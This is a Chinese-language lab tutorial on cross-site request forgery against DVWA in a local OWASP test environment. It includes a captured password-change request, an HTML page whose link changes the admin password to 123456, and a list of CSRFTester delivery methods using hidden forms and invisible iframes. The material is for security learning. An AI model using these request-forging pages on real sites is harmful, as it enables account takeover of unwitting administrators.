CSRF***流程为:
***者发现CSRF漏洞——构造代码——发送给受害人——受害人打开——受害人执行代码——完成***
完成***成功的条件:
管理员正在网站后台,或则管理员的session并没有失效。
测试网站:
owaspbwa环境中的DVWA应用环境
测试内容为CSRF漏洞
如图所示:
修改登陆密码的HTTP请求内容如下:
GET /dvwa/vulnerabilities/csrf/?password_new=admin&password_conf=admin&Change=Change HTTP/1.1
Host: 192.168.232.132
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2984.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,p_w_picpath/webp,*/*;q=0.8
Referer: https://192.168.232.132/dvwa/vulnerabilities/csrf/
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: security=low; PHPSESSID=3i35050qluj2hvvqu9rk760o81; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada
Nginx测试
本地搭建nginx环境,伪造http请求,提交http请求,直接修改192.168.232.132中DVWA的登陆口令!!!
创建csrf.html文件,内容如下:
<html>
<head>
<title>csrf漏洞测试</title>
</head>
<body>
This is a CSRF test.
<a href="https://192.168.232.132/dvwa/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change">点这里</a>
</body>
</html>
访问CSRF.html,如图所示
点击超链接,成功发送请求,且修改了DVWA的登录口令,如图所示:
使用修改后的密码可以直接登陆后台!!!
工具:OWASP-CSRFTester-1.0.jar,可以自动生成不同内容的***文件。
浏览器设置代理,端口为8008,软件看下有没有token的存在,然后开始使用。
软件中Report Type了是让你选择用什么方法来进行***:
Forms:创建一个form表单。内容为hidden(隐藏),用户不可见(可POST、GET)
iFrame:创建一个iframe框架,高宽为0,用户不可见。(可POST、GET)
IMG:创建一个IMG标签(只能GET)。
XHR:创建一个AJAX请求(可POST、GET)
Link:创建一个a标签的超链接(只能GET)
通常使用第一个就可以了
第二个容易找不到对象(如果你是新手,对JavaScript不熟的话,不建议选择这个)
第三个只能发送GET请求,有限制。
第四个有跨域限制,有的浏览器不允许发送跨域请求,除非网站有设置。
第五个需要点击才能触发(当然可以修改为自动触发),还有一个是他也只能发送GET请求。
本次测试全部为本地环境,如有雷同,纯属巧合!!!
就到这里吧!!!
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。